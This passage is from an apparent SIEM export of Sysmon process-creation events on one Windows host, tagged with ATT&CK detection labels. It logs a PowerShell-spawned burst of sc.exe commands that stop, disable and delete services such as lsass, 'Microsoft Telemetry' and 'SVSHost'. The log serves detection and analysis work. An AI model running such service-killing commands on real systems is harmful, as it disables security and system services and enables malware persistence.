sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Oracleupdate\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: 
DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:59.648"",""processGuid"":""{df9fc3d3-b377-5ecf-0000-0010d1c11d00}"",""processId"":""6008"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Oracleupdate"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:27.994",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 
2020-05-28 12:49:59.602 +ProcessGuid: {df9fc3d3-b377-5ecf-0000-001077bf1d00} +ProcessId: 5776 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop system +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop system",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:59.604165800Z"",""eventRecordID"":""2302"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:59.602\r\nProcessGuid: {df9fc3d3-b377-5ecf-0000-001077bf1d00}\r\nProcessId: 5776\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: 
sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop system\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:59.602"",""processGuid"":""{df9fc3d3-b377-5ecf-0000-001077bf1d00}"",""processId"":""5776"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop system"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo 
-NoProfile""}}}", +"May 29, 2020 @ 14:18:27.928",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:59.559 +ProcessGuid: {df9fc3d3-b377-5ecf-0000-001006bd1d00} +ProcessId: 3664 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Microsoft +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Microsoft",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:59.561288400Z"",""eventRecordID"":""2299"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:59.559\r\nProcessGuid: {df9fc3d3-b377-5ecf-0000-001006bd1d00}\r\nProcessId: 3664\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control 
Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Microsoft\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:59.559"",""processGuid"":""{df9fc3d3-b377-5ecf-0000-001006bd1d00}"",""processId"":""3664"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Microsoft"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:27.902",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:59.545 +ProcessGuid: {df9fc3d3-b377-5ecf-0000-00103fbc1d00} +ProcessId: 2596 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config Microsoft Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config Microsoft Start= 
Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:59.547522400Z"",""eventRecordID"":""2298"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:59.545\r\nProcessGuid: {df9fc3d3-b377-5ecf-0000-00103fbc1d00}\r\nProcessId: 2596\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config Microsoft Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:59.545"",""processGuid"":""{df9fc3d3-b377-5ecf-0000-00103fbc1d00}"",""processId"":""2596"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config Microsoft Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:27.870",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:59.513 +ProcessGuid: {df9fc3d3-b377-5ecf-0000-0010abba1d00} +ProcessId: 1480 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop lsass +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop lsass",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:59.515012800Z"",""eventRecordID"":""2296"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:59.513\r\nProcessGuid: {df9fc3d3-b377-5ecf-0000-0010abba1d00}\r\nProcessId: 1480\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop lsass\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:49:59.513"",""processGuid"":""{df9fc3d3-b377-5ecf-0000-0010abba1d00}"",""processId"":""1480"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop lsass"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:27.810",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:59.467 +ProcessGuid: {df9fc3d3-b377-5ecf-0000-001053b81d00} +ProcessId: 7884 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ""Microsoft Telemetry"" +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop \""Microsoft Telemetry\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:59.468590700Z"",""eventRecordID"":""2293"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:59.467\r\nProcessGuid: {df9fc3d3-b377-5ecf-0000-001053b81d00}\r\nProcessId: 7884\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop \""Microsoft Telemetry\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:59.467"",""processGuid"":""{df9fc3d3-b377-5ecf-0000-001053b81d00}"",""processId"":""7884"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop \\\""Microsoft Telemetry\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:27.724",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:59.435 +ProcessGuid: {df9fc3d3-b377-5ecf-0000-0010bfb61d00} +ProcessId: 7984 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: 
""C:\Windows\system32\sc.exe"" Delete SVSHost +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete SVSHost",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:59.437588800Z"",""eventRecordID"":""2291"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:59.435\r\nProcessGuid: {df9fc3d3-b377-5ecf-0000-0010bfb61d00}\r\nProcessId: 7984\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete SVSHost\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
